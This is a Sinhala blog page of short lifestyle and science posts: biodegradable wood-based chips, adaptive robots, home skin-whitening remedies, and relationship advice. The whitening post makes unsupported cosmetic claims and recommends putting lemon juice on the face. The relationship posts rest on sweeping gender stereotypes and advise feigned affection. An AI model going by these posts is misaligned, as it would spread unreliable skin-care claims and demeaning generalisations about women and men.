9:56 PM
වර්තමානය වන විට ඉවතලන විද්‍යුත් උපකරණ වලින් 70% ක් පමණ පොළව යට වැළලී යයි. පසුගිය වසරේ පමණක් වාර්තා ගත ලෙස ඉවතලනු ලැබූ විද්‍යුත් අපද්‍රව්‍ය ප්‍රමාණය ටොන් මිලියන 41.8 ක් ! මේ අපද්‍රව්‍ය ඉවත දැමීම නිසා පරිසරයේ ඉඩ ඇහිරෙන අතර ඒවායින් අවට පරිසරයට විෂ රසායනික ද්‍රව්‍ය මුදාහැරෙනවා.
ඇමෙරිකාවේ පර්යේෂකයන් කණ්ඩායමක් විසින් මේ සඳහා නව විසඳුමක් ඉදිරිපත් කර තිබෙනවා. ඒ ඉහල ක්‍රියාකාරිත්වයක් සහිත තනිකරම දැව ආශ්‍රයෙන් සෑදුණු අර්ධ සන්නායක චිප හඳුන්වා දීමයි. අප භාවිතා කරන චිප් වල වැඩි ඉඩ ප්‍රමාණයක් වැයවන්නේ එයට සවිමත් බවක් ලබාදීමටයි. විද්‍යුත් කොටස් අන්තර්ගත වන්නේ මයික්‍රෝ මීටර කිහිපයක පරාසයක් තුල පමණයි. මේ චිප් පරිසරයට මුදාහැරුණු පසු ශුද්‍ර ජීවීන් මගින් දිරාපත් කෙරෙනු ඇත.
මේ චිප් එකේ ශක්තිමත් බව ලබාදෙන කොටස නම්‍යශීලි දිරාපත්වන සෙලියුලෝස් නැනෝ කෙඳි (cellulose nanofibril (CNF))මගින් ප්‍රතිස්ථාපනය කෙරී තිබෙනවා. මෙය දැව ඇසුරෙන් ලබාගන්නා සවිමත් පාරදෘශ්‍ය ද්‍රව්‍යය කි.

මේ පර්යේෂණය සිදු කල Zhenqiang Ma ඇතුළු කණ්ඩායම වසර 10කට වැඩි කාලයක් මේ සඳහා මහන්සි වී ක්‍රියා කළා. ඔවුන්ට තිබු ගැටලුව වුයේ මේ සඳහා සිනිදු මතුපිටක් සහිත ද්‍රව්‍යක් සොයාගැනීමයි. තාප ප්‍රසාරණය සඳහා ද මෙය සහය දැක්විය යුතු වුණා. අවසානයේ ඔවුනට CNF හමුවුනා.
ඔවුන්ගේ ඊළඟ අභියෝගය වුනේ මේ දැව ආශ්‍රයෙන් නිමැවුණු චිපය එදිනෙදා භාවිතා වන ගැලියම් ආසනයිඩ් වලින් නිමැවුණු සාමාන්‍ය චිප් මෙන් ක්‍රියාකළ හැකි බව පෙන්වීමයි.මේ සඳහා ඔවුන් gallium arsenide ට්‍රාන්සිස්ටර 1500ක් කුඩා මිලිමීටර 5×6 චිපයකට සවිකර ඇතහදා බැලුවා.

මේ චිප් අනාගතයේ නිෂ්පාදනය වන ඉලෙක්ට්‍රොනික උපාංග වල දැකගැනීමට හැකි වෙතැයි අපේක්ෂා කරමු.

8:13 PM

අපි ජිවත් වන මේ ලෝකයේ අපේ නෙතගැටෙන මානයේ දැකගැනීමට හැකි රොබෝ යන්ත්‍ර එතරම් දියුණු හෝ අප චිත්‍රපට වල දකින රොබෝ යන්ත්‍ර තරම් බුද්ධිමත් නොවන්නට පුළුවන්. නමුත් මෑතකදී සිදුකල පර්යේෂණයක ප්‍රතිපලයක් විදියට ඕනෑම ආකාරයේ අවස්ථාවකට හැඩගැසිය හැකි රොබෝ තාක්ෂණයක් සොයාගැනීමට හැකිවෙලා තියනවා.
ඔබ මේ දකින වීඩියෝ පටයේ සිටින රොබෝගේ සිතියමේ එක් එක් පාද චලන රටා 13,000ක් පමණ අන්තර්ගත වෙයි. මෙහි ඇති සුවිශේෂී කාරණය වන්නේ පාද හයක් සහිත මේ රොබෝලා එක් එක් රෝබෝගෙන් සුළු සුළු වෙනස් ආකාරයට චලනය වීමට හුරු වීමයි. සමහර රොබෝ යන්ත්‍ර පාද 6 ම භාවිතා කොට ඇවිදින අතර සමහරෙක් පාද කිහිපයක් පමණක් භාවිතා කරයි.
මේ රොබෝ යන්ත්‍රයකට යම්කිසි අනතුරක් සිදු වූ විට එය නැවත සිතියම පරික්ෂා කොට තමාට චලනය වීමට සුදුසුම මාර්ගයක් ස්වයංක්‍රියවම තෝරාගන්නේ programmer කෙනෙකුගේ සහයක් නොමැතිවයි.
මේ සඳහා රොබෝගේ ඇති හැකියාව ඉහල මට්ටමක පවතින අතර මේ නව තාක්ෂනය භාවිතා කර අනතුරට ලක්වන රෝබෝයන්ත්‍ර තවදුරටත් ක්‍රියාකාරී ලෙස පවත්වා ගැනීමටත් බාධක මැඩගෙන ඉදිරියට යාමට හැකි රොබෝ යන්ත්‍ර නිපදවීමට හැකි වෙතැයි අපේක්ෂා කෙරෙනවා.

7:42 PM

අපි කව්රුත් කැමතියි පොඩ්ඩක් සුදු වෙන්න.හැබැයි ඉතින් ඔය කඩේ තියෙන එක එක cream ගලා මුණ සවුත්තු කර ගන්නවට වඩා හොදයි මොකුත් නොකර ඉන්න එක .එතකොට සල්ලි ටික හරි ඉතුරුයි.හැබැයි යාළුවනේ ඔයාලා දන්නවාද මුහුණ පැහැපත් කර ගන්න හොදම ක්‍රමය පුළුවන් තරම් ස්වභාවික ප්‍රතිකාර කරන එක කියලා.අනික ඒ වගේ දේවල් වලට ගොඩක් සල්ලි යන්නෙත් නෑ.හරි ඔන්න එහෙනම් අද විශ්ම ලෝකය තුලින් අපේ කෙල්ලෝ වගේම කොල්ලොන්ටත් පොඩ්ඩක් සුදු වෙන්න පුළුවන් වටිනා උපදෙස් ටිකක් දෙන්නම්.අපි දැන් මේ වැඩේ කරන්න පටන් ගන්න කොට මුලින්ම ඔබේ මුහුණ කළු වෙන්න බලපාන මුලික හේතු ටිකත් විනාශ කර ගෙනම ප්‍රතිකාර ක්‍රම ටිකත් ඒ එක්කම පටන් ගමු.


පුළුවන් තරම් අව්වේන් මුණ පරිස්සම් කර ගන්න.මොකද අව්ව තමයි අපේ සම අව පැහැ වෙන්න බලපාන ප්‍රධානම හේතුව.හිරු එළියේ තියෙන අල්ට්‍රා වයලට් (UV) කිරණ මගින් තමයි සමට මේ හානිය කරන්නේ.ඔබට අව්ව මග අරින්න බැරි නම් ඔයාට පුළුවන් Sun Block Cream එකක්  use කරන්න.හැබැයි මතක තියා ගන්න මෙන්න මේක හොදට.ඔය Sun block cream වල  තියෙනවා SPF කියලා අගයක්.අන්න එක 30 වගේ අගයක් තියෙන Sun block cream එකක් use කරන්න.එතකොට තමයි ඔයාගේ මුහුණ කළු වීමට බලපාන UV කිරණ 98% කින්ම ඔබේ සම ආරක්ෂා කර ගන්න පුළුවන් වෙන්නේ  .තව දෙයක් කරන්න පුළුවන්.ඒ තමයි ඔයා එලියට යනකොට ලස්සන Fashionable cap එකක් hat එකක් ඔලුවේ දා ගෙන යන්න.එතකොට ඔයාට ගොඩක්ම අව්වෙන් පරිස්සම් වෙලා ලස්සනට ඉන්න පුළුවන්

සතියකට කීප වතාවක්ම ඔබේ සමේ මැරුණු සෛල ඉවත් කර ගැනීම මගින් ඔබේ මුහුනට හොද එළියක් ගන්න පුළුවන් .හැබැයි මේ විදිය මුහුණ පැහැපත් වීමක් වෙන්නේ ඉර එලිය නිසා ඔබේ මතු පිට සම ඇත්තටම හානි වෙලා ඔයාගේ සැබෑ සමේ වර්ණයට වඩා මතුපිට සම කළු වෙලා තියෙනවා නම් විතරයි.facewash එකක් මගින් මුහුණ මෘදු ලෙස පිරිමදිමින් හෝ clenser එකක් භාවිතා කරලා මේ දේ කරන්න පුළුවන්.facial වගේ දේවල් දිගටම කර ගෙන යන්න.මොකද ඔබේ මුහුණේ සම ස්භාවයෙන්ම කලුයි නම් එක දිගටම facial කරලා තමයි ගොඩ දා ගන්න වෙන්නේ.

පොල් වතුරින් මුහුණ හෝදන්න.
පුදුමයි නේද ? ඔව් පොල් වතුරින් මුණ හෝදලා ඒ වතුර මුනෙම වේලෙන කම් විනාඩි 20ක් විතර ඉන්න.පොල් වතුර වල පුදුම ගුණයක් තියෙනවා මුහුණේ මැරුණු සම ඉවත් කරලා මුහුණ සුදු කරන්න පුළුවන්.

දෙහි යුෂ වලින් මුහුණ සේදීම
දෙහි බෑයක් මිරිකලා එකට වතුර වතුර ටිකක්(මිරිකපු දෙහි යුෂ ප්‍රමාණයට සමාන) දාලා ඔයාගේ මුහුණේ පුළුන් කැල්ලක් වගේ දෙයකින් හොදින් අලේප කර ගන්න.ඊට පස්සේ විනාඩි 20ක් වගේ ඉන්න.එලියට එහෙම යන්න එපා.ඉර එලියට ඔයාගේ හම හානි වෙන්න පුළුවන්.විනාඩි 20ක් ඉදලා උනු වතුරෙන් මුහුණ හෝදලා දාන්න.දෙහි කියන්නේ ගොඩක් ප්‍රභල විෂබිජ නාශකයක්.දෙහි වල අඩංගු වෙනවා alpha-hydroxy කියන අම්ලය.ඒ මගින් මුහුණේ  මැරුණු සම හොදින් ඉවත් කරලා මුහුණ සුදු කරනවා.සතියකට තුන් වතාවක් මේ දේ කරොත් හොද ප්‍රතිපල ගන්න පුළුවන්.

අල පෙත්තක් මුණේ ගාන්න 
අල ගෙඩියක් අරන් හීනියට පෙති කපලා ඔබේ මුහුණේ අලේප කරන්න.හෙමිට හෙමිට ඔබේ සමේ අල පෙත්ත උලන්න.අල වල තියෙන විටමින් C නිසා මුහුණ පැහැපත් වීමක් සිද්ධ වෙනවා.අල වලට ඔයා ඒ තර ම් කැමති නැත්තම් පිපිංචා(cucumber) පෙති යොදා ගෙන මේ වැඩේ කරන්න.මුහුනේ ගාලා පෙති දෙකක් මුහුණ උඩ තියා ගෙන හිටියත් කමක් නෑ.ඊට පස්සේ ඒ ගාපු ටික හොදටම වෙලුනාට පස්සේ උනු වතුරින් හෝදලා දාන්න.මේ වැඩේ සතියකට කීප වතාවක් කරන්න.

අමු කහ olive තෙල් එක්ක mix කරලා මුහුණේ ගාන්න 
අමු කහ හොදට තලලා කුඩු කර ගෙන එකට සමාන olive oil ටිකකුත් එකතු කරන් මුහුණේ ආලේප කරන්න.විනාඩි 20ක් වගේ තියලා උනු වතුරෙන් හෝදලා දාන්න.කහ වලට හැකියාව තියෙනවා  මෙලනින් කියන සමේ අදුරු වර්ණය ඇති කරන සන්ගටකය නිෂ්පාදනය කරන එක අඩු කරවන්න.

මුහුණේ කොමාරිකා යුෂ ආලේප කිරීම 
කෝමාරිකා වල තියෙනවා anthraquinone කියලා සන්ගටකයක්.ඒ මගින් සමේ මැරුණු සෛල ඉවත් කරලා මුහුණ පැහැපත් කරන  බව විද්‍යාත්මකව ඔප්පු වෙලා තියෙනවා.ඔයලා හොදට හොයලා බැලුවොත් ඔය කඩේ තියෙන ගොඩක් මුහුණ පැහැපත් කරන්න ගාන cream ජාති වල මේ කෝමාරිකා අඩන්ගුයි.ඉතින් මොකට ද වැඩි ගානක් දීලා කඩේ තියෙන ජාරාව මුනේ ගාන්නේ.ගෙවත්තේ පොඩි කෝමාරිකා පලයක් වවාගන්න.එතකොට ඔයාට පුළුවන් ස්භාවික කෝමාරිකා වල ගුණය මගින් ඔයාගේ මුහුණ පහසුවෙන්ම සුදු කර ගන්න.කෝමාරිකා යුෂ මුහුණේ ගාල විනාඩි 20ක් තියලා උණුවතුරින් හෝදලා දාන්න.

අමු ගස්ලබු mask එකක් දාමු
ගස්ලබු වල තියෙනවා papaine කියලා එන්සයිමයක්.ඒ වගේම විටමින් C ත් තියෙනවා .ඒ මගින් සම පැහැපත් කරනවා.හැබැයි මතක තියන ගන්න ඔයා මේ mask එක දාන්න කොල පාට අමු ගස් ලබූ ගෙඩියක් යොදා ගන්න.එකට හේතුව තමයි ගස්ලබු ගෙඩිය අමු වෙන්න වෙන්න අර papaine කියන්න එන්සයිමය හොද තත්වයෙන් තියෙන නිසා.ගස්ලබු ගෙඩිය කලි කපලා blender කරලා මුහුණේ ගලා විනාඩි 20ක් තියලා උනු වතුරින් හෝදලා දාන්න 

කඩල පිටි mask එකක් දාමු
කඩල පිටි මේස හැදී දෙකකට අවශය පමාන වතුර එකතු කරගෙන mask එක දාන්න අවශ්‍ය තලපය හදා ගන්න.ඊට පස්සේ එකට දෙහි යුෂ ටිකකුත් එකතු කරලා මුහුණේ ගාන්නකෝ.මතක තියා ගන්න මේක මුහුණේ ගාන කොට උඩු අතට ගාන්න.

ඒ වගේම ඔයාලට පුළුවන් මීපැණි එක්ක දෙහි යුෂ mix කරලා මුහුණේ ගාන්න

හරි එහෙනම් යාළුවනේ මේ ටික කරලා බලන්නකෝ

7:29 PM

කොහොමද යාලුවනේ !!! විශ්ම ලෝකය එක්ක එකතු වෙලා ඉන්න මගේ යාළුවන්ට ගොඩක් වැදගත් දේවල් ටිකක් අරන් ඔන්න අදත් හොද ලිපියක් දෙන්න හදන්නේ.අද කියන්න යන්නේ හැම ගැහැනියක් විසින්ම තම  පිරිමියාට කියන බොරු පහක් ගැන.මේ විදියට බොරු කියන්න විවිද හේතු තියෙන්න පුළුවන්.ඒ මොනවා උනත් පිරිමි වගේම ගැනුත් බොරු කියනවා.ගැහැණු කියන දේවල් තේරුම් ගන්න එක හරිම  අමාරු වැඩක්.හිතේ එකක් තියා ගෙන කටින් කියන්නේ තවත් එකක්.

මට මේ අහන දේට අවංකව ඇත්තම කියන්නකෝ , මට පුලවන් දරා ගන්න(Be honest,i can take it )
ගැනුන්ගේ මෙන්න මේ බොරුව නම් ඔයාලා ඕනේ තරම් අහලා ඇති.මෙහෙම හිතන්නකෝ ඔන්න ඔයාගේ බිරිද හෝ පෙම්වතිය අලුත් කොන්ඩ මෝස්තරයක් දාලා ඔයාගෙන් අහනවා එක ලස්සනයි ද කියලා කියන්න කියලා.මේ ප්‍රශ්නේ අපෙන් අහලා අන්තිමට පොඩි කැල්ලකුත් add කරනවා මෙන්න මේ  වගේ."ඔයා මට අවංකවම ඇත්ත කියන්නකෝ මේ කොන්ඩ style එක ගැන / ඇත්තම කියන්න අහ්හ් මට අව්ලක් නෑ".අහුවෙන්න නම්  එපා කොල්ලනේ .ඔය අන්තිමට add කරන ටික ලෝක බොරුවක්.ඒක නිසා ගොඩක් හොදයි කියන්න යන්නත් එපා.කීයටවත් නරකයි කියන්න යන්නත් එපා.මැද මාවතේ උත්තරයක් දෙන්න.ගොඩක්  පිරිමි  නම් මේ බොරුවට හොදටම අහු වෙනවා.

මගේ හිතේ ඔය ඉරිසියාව නැනේ 
ඉරිසියාව නැත්තම් ඉතින් ගෑනියෙක් වෙන්න බෑ.මේක පට්ටම පට්ට ගල් පැලෙන බොරුවක්.ගැනුන්ගේ හිත් වල ඉරිසියාව නැත්තම් ඉතින් ලෝක පුදුමයක්.ඔබේ පෙම්වතිය හෝ බිරිද මෙහෙම කියනවා නම් කවදාවත් මේ දේ විශ්වාස කරන්න  යන්න එපා


මට ඔයාව අමතක කරන්න බැරි කමක් නෑ / මම ඔයාට පිස්සු වැටිලා නෑ  (I am not mad at you)
මේ වගේ දෙයක්  ඔබේ පෙම්වතිය හෝ බිරිද විසින් ඔයාල දෙන්න රණ්ඩුවක් වෙන වෙලාවට ප්‍රකාශ  කරොත් එක ගොඩක් වෙලාවට අමුලික බොරුවක්.ඇය එහෙම කරන්නේ ඔබව රිද්දන්න මිසක් ඇත්තට නෙවෙයි.ඇය එහෙම දරුණු දෙයක් කියන්න නම් සාධාරණ හෙතුවක් තියෙන්න ඕනේ ඔබ ගැන ඇයගේ හිත තුල ලොකු කලකිරීමක් ඇති වෙන්න.එහෙම සාදාරන හේතුවක් නැතුව ඇය මෙහෙම  ප්‍රකාශයක් කරොත් ඔබ කිසි ලෙසිකින් වත් බිය වීමට අවශ්‍ය නෑ.මොකද එක ගැණු පිරිමින්ට කියන ලොකුම ටොම් පච පහෙන් එකක්  නිසා

ඔබ හොදට කලා නියමයි (You were great/you did well)
ඔබේ බිරිද හෝ පෙම්වතිය විසින් ඇය වෙනුවෙන් ඔබ කරපු දෙයක් වෙනුවෙන් මෙන්න මේ වගේ වචන දාලා ඕනෙවට වඩා අගය කිරීමක්   කරන කොට පොඩ්ඩක් පරිස්සමට මේ ගැන කල්පනා කරන්න.ඔබ ඇය වෙනුවෙන්  කරපු වැඩෙන්/උදව්වෙන් ඇය සැබෑ ලෙසම සතුටු උනා නම් ඇය ඔබට කෘතඤ වෙන විදියක් තියෙනවා."ඔයා  කරපු දේට මං ගොඩක් ණයගැතියි" වගේ වාක්‍යක් භාවිතා කරාවි.නැත්තම් ඇය ඔබට පෙරලා මොනවා හරි උදව්ව්වක් කරනන් හොයයි ඒ වෙනුවට.හැබැයි එහෙම නැතුව ඔබ හොදට කරා,නියමයි වගේ වචන දාලා නිකන් ඕනෙවට වඩා ඇය ඔබව අගය කරනවා නම් ඒ කරන්නේ බොරුවට.කරන්න දෙයක් නැති කමට.එහෙම උනොත් එක දෙයයි ඉතින් හිතා ගන්න තියෙන්නේ.ඔබ කරපු වැඩේ අසාර්තකයි.

මම මගේ පරණ පෙම්වතාව අමතක කරලා ඉවරයි.මන් එයා ගැන තව දුරටත් හිතන්නේ නෑ
ගැහුණු පිරිමි බේදයකින් තොරව තමුන් කලින්  ආදරය කරපු අය ගැන ඉදලා හිටලා හරි හිතනවා.පිරිමින්ට වඩා හැබැයි ගැනු තමයි මේ දේ වැඩියෙන් කරන්නේ.ඇය නිරන්තරයෙන් ඔබව පරණ පෙම්වතුන් සමග සංසන්දනය කරනවා.එක නවත්තන්න බෑ.එක ගැහුණුන්ට උත්පත්තියෙන්ම ලැබිලා තියෙන දෙයක්.ගැහැණු ඔබව මැරෙන කම් අනිත් අය එක්ක සංසන්දනය කරනවා.ඒ නිසා මේ ගැනත් දැන ගෙන ඉන්න

ඔන්න එහෙනම් ගැහැණු විසින් පිරිමින්ට කියන ලොකුම බොරු පහ ගැන ලිපිය ලියලා ඉවරයි.එහෙනම් FB එක පැත්තට පොඩි share පාරකුත් දාගෙන යන්නකෝ හොද යාලුවෝ ටික වගේ.ඔයාලට සුබ දවසක්

8:24 AM

කොල්ලෙක් කෙල්ලෙක්ට ආදරේ කරනකොට, එහෙමත් නැත්තම් කෙල්ලෙක් කොල්ලෙක්ට ආදරේ කරනකොට තමන්ගේ සහකාරයාගේ, එහෙමත් නැත්තම් සහකාරියගේ හිත දිනාගන්න විවිධාකාරයේ වැඩ කරනවනේ. ඒ අය ආසා දේවල් මොනවද, අකමැති දේවල් මොනවද කියලා යාලුවන්ගෙන් හරි අහලා දැනගන්නවා. මොකද එහෙම කලාම තමයි ඒ දෙන්නා අතරේ තියෙන ආදරේ තව තවත් වැඩි වෙන්නේ. අපි අද කියන්න යන්නේ ඒ විදියට කෙල්ලෙක් කොල්ලෙක් ගැන දන්නේ නැති, නමුත් අනිවාර්යෙන්ම දැනගතයුතු කරුණු කීපයක් පිළිබඳව... බලන්න ඔයත් මේ දේවල් දන්නවද කියලා..


1. කොල්ලන් ගොඩක් කැමතියි කෙල්ලන් සමග විනෝදෙන් කාලය ගත කිරීමට.
2. නමුත් නින්දට යන විට ඔවුන් සෑම විටම සිතන්නේ තමන් ආදරය කරන කෙල්ල ගැන පමණි.
3. කොල්ලෙක්ට කෙල්ලෙක් ගැන ආදරයක් හිතුනොත් ඔවුන්ට පුලුවන් ඒ කෙල්ලගේ නරක ගතිගුණයන් පවා අමතක කරන්න.
4. අහිංසක සිනහවක් තියෙන කෙල්ලන්ට කොල්ලන් ගොඩක් කැමැත්ත දක්වයි.
5. තමන් හිත ගිය කෙල්ලගේ අවදානය තමන් කෙරෙහි යොමුකර ගැනීමට කොල්ලන් ඹ්නිම අවදානම් දෙයක් කිරීමට පෙළඹෙයි.

6‍. තම පෙම්වතියගේ කලින් පෙම්වතා ගැන කථා කරනවාට කොල්ලන් පොඩ්ඩක්වත් කැමති නෑ.
7. දුකකදී කොල්ලන්ටද කෙල්ලන් මෙන් හැඬීමේ හැකියාව ඇත. නමුත් බොහෝ විට ඔවුන් එය නොපෙන්වයි.
8. කොල්ලන් ඕනිම දෙයක් පිළිබඳ හිතේ බලාපොරොත්තු පොදිබැඳ සිටින පිරිසක් නොවෙයි.
9. කෙල්ලන් බැහැ යැයි කියන දෙය කොල්ලන්ට ඇසෙන්නේ ‘‘බලමු‘‘ ලෙසය.
10. කොල්ලන් තම මවට පණ මෙන් ආදරය කරයි.

11. කොල්ලන් තම පෙමිවතියගේ උපන් දිනයට තෑග්ගක් අරන්දීමට නොකා නොබී හෝ මුදල් එකතුකර ගන්නා පිරිසකි.
12. කොල්ලන් බොහෝ විට තමන්ට කැමැත්තෙන් සිටින කෙල්ලෙක් ගැන සිතයි. නමුත් එහි තේරුම ඔහුද ඇයට කැමති යන්න නොවෙයි.
13. කොල්ලෙක් කෙල්ලෙක්ට ආදරෙයි යැයි පැවසුවහොත් ඔහුගේ හිතේ සැබෑවටම ඇය ගැන ආදරයක් පවතී.
14. කොල්ලෙක් තම ප්‍රශ්නයක් පවසන විට එය අසා සිටීමයි ඔහුට අවශ්‍ය වන්නේ, නැතුව ඔබගේ අවවාද නොවෙයි.
15. කොට සායක් ඇඳන් ඉන්න කෙල්ලෙක්ට වඩා දිග සායක් ඇඳන් ඉන්න කෙල්ලෙක් කොල්ලෙක්ගේ සිත දිනා ගැනීමට සමත් වෙයි.

16. කෙල්ලන් රහස් යැයි පවසන දේවල් තම හොඳම යාලුවාගෙන් සඟවා සිටීමට කොල්ලන්ට නොහැකිය.
17. කොල්ලන් සෑමවිටම තම ආදර සම්බන්දය රුකගැනීමට කැපවෙන පිරිසකි.
18. අවුරුදු 3ක් හෝ ඊට වැඩි ආදර සමිබන්ධයක බිඳ වැටීම කොල්ලෙක්ට දරාගත නොහැකි දුකකි.
19. කොල්ලන් තම යහලුවන් සමග සිංහයන් සේ සිටියද තම පෙමිවතිය ලඟදී පූස් පැටව් මෙන් අහිංසක වේ.
20. කොල්ලෙක් වැදගත් යමක් පවසන විට එය උවමනාවෙන් අසා සිටීම ඔහුගේ සිත දිනාගැනීමට සමත් වේ.

21. කෙල්ලෙක් කොල්ලෙක්ට කැමැත්තෙන් සිටිනවානමි ඔහුට එය ක්ෂණයකින් වැටහේ. නමුත් කෙල්ල එය පවසනතුරු ඔහු එය තහවුරු කර නොගනී.
22. කෙල්ලන් රොමෑන්ටික් නවල්ස් කියවීමට හා තම රූපය ලස්සන කිරීමට ගන්නා කාලයට වඩා කොල්ලන් වීඩියෝ ගේමිස් ප්ලේ කිරීමට හා ක්‍රිකටි මැචි බැලීමට කාලය වැය කරයි.
23. කොල්ලන් ගොඩක් කැමතියි හොඳට උයන්න පුලුවන් කෙල්ලන්ට.
24. ඒ වගේම තම මව වැනි කෙනෙක් තම ජීවන සහකාරිය කරගැනීමට කැමැත්ත දක්වයි.
25. කොල්ලෙක්ගේ හොඳම යහලුවා ඔහුගැන සියලුම දේවල් දැන සිටී.

26. පළමු ප්‍රතික්ෂේප කිරීමේ ඉගියෙන්ම කොල්ලෙක්ට කෙල්ලෙක් අතහැරීමේ හැකියාව ඇත. එමනිසා බොරු අහංකාරය නොපෙන්වන්න.
27. කොල්ලෙක්ට තම ඕනම ප්‍රශ්නයක් තනිව විසඳාගැනීමේ හැකියාව හා ආත්ම විශ්වාසය ඇත.
28. කොල්ලන් යමක් ඉගෙනගන්නේ තම අත්දැකීම් තුලින් මිස කෙල්ලන් මෙන් නවකතා පොත් හෝ චිත්‍රපට තුළින් නොවේ.
29. කොල්ලන් තම පෙමිවතියට තමන්ගේ ඕනිම දෙයක් ඇල්ලීමේ අවසරය දුන්නද තම කොණ්ඩයෙන් අල්ලනවාට එතරම් කැමැත්තක් නොදක්වයි.
30. කොල්ලෙක් කෙල්ලෙක්ට ඔබ අද හරි ලස්සනයි යැයි පැවසුවහොත් ඔහු ඇයට ඇත්තටම කැමැත්තක් දක්වයි.
31. පමණට වඩා ෂෝ දාන කෙල්ලන්ට කොල්ලන් පොඩ්ක්වත් කැමති නැත.
32. කොල්ලෙක් තම පෙමිවතියට ඇත්තටම ආදරෙයිනම් තම පෙමිවතිය තමන්ට ආදරය කරනවාට වඩා වැඩියෙන් ඇයට ආදරේ කිරීමට කොල්ලෙක්ට පුලුවන්. 

සැකසුම :- මල්ෂානී

7:04 PM
පි නම් අහලා තියෙන විදියට කාන්තාවෝ කියන්නේ බොහොම open කිසිම රහසක් රකින්න බැරි ඕනේ දෙයක් හැමෝමත් එක්ක කියවන කෙටියෙන්ම කිව්වොත් කට වහගෙන විනාඩියක් වත් එක දිගට ඉන්න බැරි අමුතුම මානව කොට්ටාසයක් විදියටනේ.එත් දන්නවද හැම ගැහැනියකගේම ජිවිතේ ඇතුලේ අභිරහසක් තියෙනවා කියලා.හැබැයි ඒවා මහා ලොකු දේවලුත් නෙවෙයි.එත් පිරිමින්ට හරිම අමාරුයි මේ ගැහැනුන්ගේ හිත් අස්සේ හැංගිලා තියෙන රහස් තේරුම් ගන්න.කෙටියෙන්ම කිව්වොත් හැම ගැහැනියක්ම තම පිරිමියාගෙන් බලාපොරොත්තු වෙන දේවල් ටිකක් තියෙනවා.හැබැයි ඒ දේවල් කවදාවත් තම පිරිමියාට කියන්නේ නෑ. ඒවා හැමදාම රහස් විදියට ගැහැණුන්ගේ හිත් අස්සේ හැංගිලා තියෙනවා.ඉතින් මේ අභිරහස් දැනගත්තු පිරිමි එක්ක ගැහැණු ගොඩක් සතුටින් ඉන්නවා.බැරි උනු අයට ඉතින් sorryම තමා.බය වෙන්න එපා අද විශ්ම ලෝකය තුලින් ගැහැණු පිරිමින්ගෙන් බලාපොරොත්තු වෙන එත් කවමදකාවත් පිරිමින්ට නොකියන දේවල් ගැන ඔයාලාට කියලා දෙන්නම්.



ගැනු කැමතියි ගෙදර පිරිමියා හැම වැඩකම මුලිකත්වය අරන් කරනවට

ඔව් මෙන්න මේ කරුණ ගොඩක්ම වැදගත්. අපි ගෑනුන්ටත් සැම තැන දෙන්න ඕනේ කියලා හැම දෙයක්ම ඒ ගොල්ලෝ කියන විදීයටම කරනවට කාන්තාවෝ කොහොමත් කැමති නෑ.ඒ ගොල්ලෝ ගොඩක් ආසයි ගෙදර වැඩ හැම එකක්ම පිරිමියා මුලිකත්වය අරන් කරනවට.ඒ නිසා ගෙදරට ගෙන පුංචි බඩු ලිස්ට් එක උනත් ඔයා පොඩ්ඩක් විහිලුවට හරි පරික්ෂා කරලා බලලා ඒ හැම දෙයක් ගැනම තමුන් හොද අවබෝදයකින් කටයුතු කරන බව පෙන්වන්න.කවදාවත් ගෙදර වැඩ කටයුතු වල මුලිකත්වය කන්තාවන්ට දෙන්න යන්න එපා.ඒ දේට කාන්තාවෝ ඒ තරම් කැමති නෑ.පිරිමියා පිරිමියෙක් විදියට කටයුතු කරනවට තමයි ඒ ගොල්ලෝ හිත යටින් ආසා කරන්නේ.



ගෑනු කැමතියි නොසිතු ලෙස විවිධ කරන පුදුම කිරීම් (surprices) වලට

තමුන්ගේ සහකරුවා විසින් නිර්මාණාත්මක ලෙස සැලසුම් කරපු විවිධ දේවල් හරහා ඒ ගොල්ලෝ පුදුම කරනවට ගැනු අය ගොඩක් කැමතියි.එතකොට තමයි ගෑනුන්ට හිතෙන්නේ ඒ ගොල්ලෝ තමුන්ගේ සහකරුවාගේ සිත තුල විශේෂ කෙනෙක් කියලා තේරෙන්නේ.ඇත්තටම මෙහිදී නිතර නිතරම මහා ලොකු ඉතාමත් මිල අධික තෑගි බෝග දෙන්නම අවශ්‍ය නෑ.පුංචි රස කෑමක් හරි ඔබේ බිරිදට හෝ පෙම්වතියට ඉදලා හිටලා අරන් යන එකත් ඒ ගොල්ලොන්ගේ හිත් ඇතුලේ පිරිමින්ට ගොඩක් ලකුණු ලැබෙන දෙයක්.






ගැනු ගොඩක් බයයි තමුන්ගේ සහකරු ඇසුරු කරන අනිත් කාන්තාවන් විසින් සහකරුගේ ආදරය සොරකම් කරයි කියලා

ගොඩක් ගැනු අයගේ හිත යට තියෙන ලොකු බයක් තමයි තමුන්ගේ සහකරුවා වැඩ කරන office එකේ ගැනු අය , සහකරුවා ආශ්‍රය කරන මිතුරියෝ වගේ අය එයාගේ ආදරය හොරකම් කරයි කියලා.ඉතින් එක නිසා පිරිමි අය ගොඩක් පරිස්සමින් අනිත් ගැනු එක්ක වැඩ කරන්න.නිතරම තමුන්ගේ පෙම්වතිය හෝ බිරිද ලෝකේ ඉන්න ලස්සනම හා හොදම කාන්තාව බව එයාට අගවන්න ඕනේ.අනිත් ගැනු තමා සත පහකට මායිම් කරන්නේ නැති බව පෙන්වන්න.ඇත්තටම මේක බොරු රගපෑමක් විතරයි.හැබැයි ඔයාට ගොඩක් ලකුණු ලබා ගන්න පුළුවන්.




ගැනු කැමතියි තමුන්ගේ පිරිමියා තමුන් ඉදිරියේදී ගොඩක් අවංක වෙනවට

ඔව් මේ දේ ගොඩක්ම වැදගත්. බාහිර ලෝකයෙදී තමුන්ගේ පිරිමියා මොන වගේ කෙනෙක් උනත් තමුන් ඉදිරියේ අවංක වෙනවට ගැනු ගොඩක් කැමතියි.කවදාවත් ගෑනුන්ට අහු වෙන බොරු කියන්න එපා.ගැනු ගොඩක් අප්‍රිය කරනවා බොරු කියන අයව.තමුන්ගේ පෙම්වතියට හෝ බිරිදට බොරු කියනකොට ගැනු හිතනවා එයාලව දැන් විහිළුවක් වෙලා කියලා.ඒ ගොල්ලොන්ගේ වටිනාකම අඩු වෙලා කියලා.එතකොට ඔබේ ලකුණු ගොඩක් කැපෙනවා.සැලකිලි අඩු වෙනවා.බොරු කියන එක තමයි හේතුව.



ගැනු කැමතියි තමුන්ගේ පිරිමියා පොඩ්ඩක් විතර යාලුවෝ එක්ක fun එකේ ඉන්නවට

